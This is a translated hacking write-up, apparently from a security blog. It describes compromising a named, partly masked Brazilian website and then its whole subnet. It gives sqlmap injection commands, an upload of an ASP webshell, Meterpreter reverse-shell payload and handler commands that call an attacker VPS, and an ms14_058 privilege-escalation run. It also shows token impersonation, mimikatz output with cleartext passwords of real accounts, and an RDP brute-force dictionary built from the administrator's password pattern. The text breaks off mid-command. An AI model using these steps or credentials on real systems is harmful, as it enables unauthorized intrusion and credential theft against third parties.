Title: See how I quickly get permissions to the entire C segment host

0x01 Introduction

Date/time: In 2015, during this penetration test, it was found that the administrator passwords of several machines that had been obtained had certain regularities. Finally, by analyzing the password rules and combining new passwords, I successfully obtained the entire C-segment machine permissions of the target. I personally feel that this is a good practical case of universal/regular passwords in the intranet, so I thought it would be better to record it.

0x02 Getshell process

Website basic information detection:

Target site: http://www.that****elos.com.br

Server IP: 189.**.**.204 (Brazil)

Environmental Platform: ASP.NET

Server system: The Windows website prohibits domestic IP access, so I can only go to the wall to do the test. I first use Chrome browser plug-in and fingerprint recognition website to not get the specific version of the server system. However, based on my personal experience, this should be Windows 2003.

Chrome browser plug-in: Server Details 1.0.12, Wappalyzer

Server system identification: http://fuwuqixitongshibie.51240.com/?q=

Website backend address: http://www.that****elos.com.br/admin/Then we used the Safe3WVS_v10.1 vulnerability scanning tool to successfully find several injections, and used the sqlmap tool to verify that this injection point does exist and has already run out of the administrator's table and column, but an error was reported when running the administrator user password.

Running watch name:

sqlmap -u 'http://www.that****elos.com.br/detalhe_produto.asp?codProd=510' --tables

[7 tables]: categoryas, clients, destaques, itens, pedidos, produtos, usuarios running column names:

sqlmap -u 'http://www.that****elos.com.br/detalhe_produto.asp?codProd=510' -T 'usuarios' --columns

[5 columns]: codusuario, email, login, nome, senha run data:

sqlmap -u 'http://www.that****elos.com.br/detalhe_produto.asp?codProd=510' --dbms access -T 'usuarios' -C 'email,login,senha' --dump --threads 10 Don't worry about why there is an error when SQLmap runs data. Since the administrator's table and columns have been obtained, you can directly use other injection tools to run the administrator user password, such as: A D, Ming Xiaozi and other injection tools, use it flexibly!

Through this injection point, I successfully obtained the website administrator account and password, logged into the website background and found an upload without any filtering, and directly passed an ASP picture horse, and successfully obtained the Webshell permissions of this site.

0x03 Practical power promotion process

Server basic information detection:

Ports open: 21, 80, 135, 443, 445, 873, 65432

Patch status: 750+ system patches were applied (Windows 2003 x86)

Script detection: only supports ASP script files, not PHP or ASPX

Disk permissions: Some folders in the C disk have readable/write permissions. They cannot be cross-site for so long. It is the first time that they encountered a 2003 machine with 750+ patches. Although they know that the probability of using EXP to obtain EXP is not high, they still have to try it. Maybe it will be "successful". After trying the following EXPs, the final result was expected and failed.

pr.exe, Churrasco.exe, 2003.exe, NDProxy.exe, iis6.exe, MS11-046.exe, MS10-048.exe, MS11-080.exe, MS13-051.exe, debug.exe. Let's try the ms14_058_track_popup_menu privilege escalation module again. Since the target prohibits access to domestic IP addresses, the target machine session cannot be obtained after running the attack payload file, so the author tests on a foreign VPS.

root@c2unix:~# msfpayload windows/meterpreter/reverse_tcp LHOST=37.*.**.52 LPORT=443 X /media/sf_Temp/test.exemsf use exploit/multi/handler

msf exploit(handler) set payload windows/meterpreter/reverse_tcp

msf exploit(handler) set lhost 37.*.**.52

msf exploit(handler) set lport 443

msf exploit(handler) exploit

[*] Started reverse handler on 37.*.**.52:443

[*] Starting the payload handler.

[*] Sending stage (770048 bytes) to 189.**.**.204

[*] Meterpreter session 1 opened (37.*.**.52:443 - 189.**.**.204:1150) at 2015-01-01 13:48:01 +0000 View the current session permissions and system information, and tried to use getsystem to increase the privileges. Unsuccessful, put the current session in the background and continue to load the ms14_058_track_popup_menu increase the privileges module for testing.

meterpreter getuid

Server username: $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c

meterpreter getsystem

[-] priv_elevate_getsystem: Operation failed: Access is denied.

meterpreter sysinfo

Computer : WEB200

OS : Windows .NET Server (Build 3790, Service Pack 2).

Architecture : x86

System Language : pt_BR

Meterpreter : x86/win32

meterpreter background

[*] Backgrounding session 1.msf exploit(handler) use exploit/windows/local/ms14_058_track_popup_menu

msf exploit(ms14_058_track_popup_menu) set payload windows/meterpreter/reverse_tcp

msf exploit(ms14_058_track_popup_menu) set lhost 37.*.**.52

msf exploit(ms14_058_track_popup_menu) set lport 443

msf exploit(ms14_058_track_popup_menu) set session 1

msf exploit(ms14_058_track_popup_menu) exploit

[*] Started reverse handler on 37.*.**.52:443

[*] Launching notepad to host the exploit.

[+] Process 11464 launched.

[*] Reflectively injecting the exploit DLL into 11464.

[*] Injecting exploit into 11464.

[*] Exploit injected. Injecting payload into 11464.

[*] Payload injected. Executing exploit.

[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.

[*] Sending stage (770048 bytes) to 189.**.**.204

[*] Meterpreter session 2 opened (37.*.**.52:443 - 189.**.**.204:1788) at 2015-01-01 14:03:44 +0000 Here we can see that using the ms14_058_track_popup_menu privilege raising module gets a new meterpreter session, but it is still ordinary permissions. This situation has been encountered many times in previous practical cases. The specific reason is unknown and I have not studied it in depth.

meterpreter getuid

Server username: $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c

meterpreter getsystem

[-] priv_elevate_getsystem: Operation failed: Access is denied.

meterpreter hashdump

[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.ms14_058_track_popup_menu's authority upgrade module failed. The author fell into deep thought. and suddenly thought that there was an incognito expansion under meterpreter, which can be used to steal the token of the target host or impersonate users.

Let’s first look at several administrator users in this server, which is convenient for finding the administrator tokens later. You can see that in addition to the default Administrator, there is also a cronjob.

list_tokens -u lists available user tokens. There are too many available user tokens listed here. The author used.Snip. to omit a part. You can see that there is a cronjob administrator token in the available user token.

List available user tokens:

meterpreter use incognito

Loading extension incognito.success.

meterpreter list_tokens -u

[-] Warning: Not currently running as SYSTEM, not all tokens will be available

Call rev2self if primary process token is SYSTEM

Delegation Tokens Available

=====================================================

AUTORIDADE NT\SERVI?O LOCAL

WEB200\aewcorp

WEB200\attcorreia

WEB200\cronjob

WEB200\sueddesigner

.Snip.

Impersonation Tokens Available

=====================================================

WEB200\aluggo

WEB200\ciacompropaganda

WEB200\datahome

WEB200\ipirangacontabil

WEB200\web200

.Snip.fake cronjob user token:

meterpreter impersonate_token WEB200\\cronjob

[-] Warning: Not currently running as SYSTEM, not all tokens will be available

Call rev2self if primary process token is SYSTEM

[+] Delegation token available

[+] Successfully impersonated user WEB200\cronjob

meterpreter getuid

Server username: WEB200\estoquedomarmorista

meterpreter hashdump

.Snip. The current machine IP address is: 189.**.**.204, remote port number: 65432, computer name: WEB200, the target system clear text password captured using the mimikatz French artifact under meterpreter is as follows, and the administrator hash password cannot be cracked (=16 bits).

0;980627246 NTLM WEB200 Administrador w3b200r0x0271114

0;3450401626 NTLM WEB200 cronjob 016b2023ee9b897ca643

0;1214252650 NTLM WEB200 web200 p1cadasgalaxi4s

0;1236893630 NTLM WEB200 thatycabelos vbs147369

0;74485534 NTLM WEB200 iis_user 123abc!#Using some common vulnerabilities, I got the Webshell permissions of the 189.**.**.9 and 189.**.**.55 servers in segment C. When I elevated the authority, I found that there were many similarities with the 204 server I just mentioned.

Such as: some folder permissions, uploading cmd.exe execution commands, server system host name, some command permissions are insufficient, the same remote port number, etc.

It’s just that we cannot execute the EXP that we uploaded ourselves, and the0x2331 error is prompted, as shown in the figure below. However, it seems that as long as the server restarts, the EXP can be executed normally, or you can try to change the uploaded EXP suffix to TXT.

0x04 Password/domain name rules

Based on some information and personal experience obtained on several machines, it is basically possible to determine that all machines in this C segment are the same administrator, so the passwords used by the administrator must be found in a regular way. Next, let’s analyze the rules of its password together.

(1) Password rule analysis

Commonly used administrator users on several machines include: Administrador, cronjob. 189.**.**.204 The Administrador password of this server is: w3b200r0x0271114. The password rules are mainly related to the 3-digit numbers in the host name and have nothing to do with the IP address.

w3b=fixed value, 200=computer name (3 digits), r0x0271114=fixed value Use the WPS table function to extract the host name 3 digits:=RIGHT(H2,3), combine a new password:=B2C2D2, and finally combine the administrator passwords of the two machines C segments 189.**.**.9, 189.**.**.55 through the password rules, as shown in the figure below.

At present, it can only be known through the controlled machine. So how can we get its host name when we do not get the Webshell permissions of other machines in segment C? Or is there a way to directly enter other servers in Section C? Of course there is, here only one idea is provided.

Blasting ideas:

The default RDP port is 3389, and the RDP ports of several machines obtained are 65432. We can generate an efficient dictionary based on the password found to RDP blast all IPs in this segment 189.**.**.X, and control the 3-digit number of the host name to 300. If it does not work, then increase it.

w3b200r0x0271114

w3b201r0x0271114

w3b202r0x0271114

w3b203r0x0271114

w3b204r0x0271114

w3b205r0x0271114

w3b206r0x0271114

w3b207r0x0271114

w3b208r0x0271114

w3b209r0x0271114

w3b210r0x0271114

.Snip.

(2) Domain name rule analysis

I saw a subdomain like "hostname.test.net" many times in the test. After visiting several, I confirmed my idea: the administrator resolved such a subdomain on each server, and the naming rule is: hostname.test.net.

After knowing the domain name rules, you can save the webshell and get the host name directly. Finally, you can enter other machines in Section C by combining passwords. After testing more than 10 units, it is OK.

Image metaphor:

All machines in Section C fall=Password rules + Hostname + Domain name rules, Password rules=Father, Hostname=Son, Domain name rules=Mother, father and mother both need sons. Only living together can be considered a complete family, and neither is missing.

Ideas expansion:

Generate an efficient "host name.test.net" subdomain dictionary according to the domain name rules, and control the host name to 300. Then, batch ping these subdomains through scripts to obtain the IP address and corresponding host name of the C-segment surviving machine, and then combine the new password according to the password rules.

web200.test.net

web201.test.net

web202.test.net

web203.test.net

web204.test.net

web205.test.net

web206.test.net

web207.test.net

web208.test.net

web209.test.net

web210.test.net

.Snip.We can directly use the WPS table function to combine a new password:=B2(RIGHT(LEFT(E2,6),3)D2), and finally combine the administrator passwords of all surviving machines in segment C through the password rule, as shown in the figure below.

0x05 Summary

In the internal/domain environment, we often encounter common/regular passwords. Generally, we use host name, IP address, year and common characters 123/qwe/!@#, etc. as rules. We can also analyze the common points and rules of various passwords such as website background, middleware, database, third-party software, etc. and then combine and generate efficient dictionaries for blasting. To borrow a sentence from @江天: The essence of infiltration is information collection.

1. Collect information on the target system. Here, the system is Windows 2003 IIS6.0 through the online CMS fingerprint. It is found that the website administrator background directory is admin2 through the Yujian directory scanning tool. The user name and password scan tool were successfully found. Several injections were found using the Safe3WVS_v10.1 vulnerability scanning tool, and used the sqlmap tool to verify that this injection point does exist, and the administrator's table and column have been run out, but the user name and password can not be run out: sqlmap -u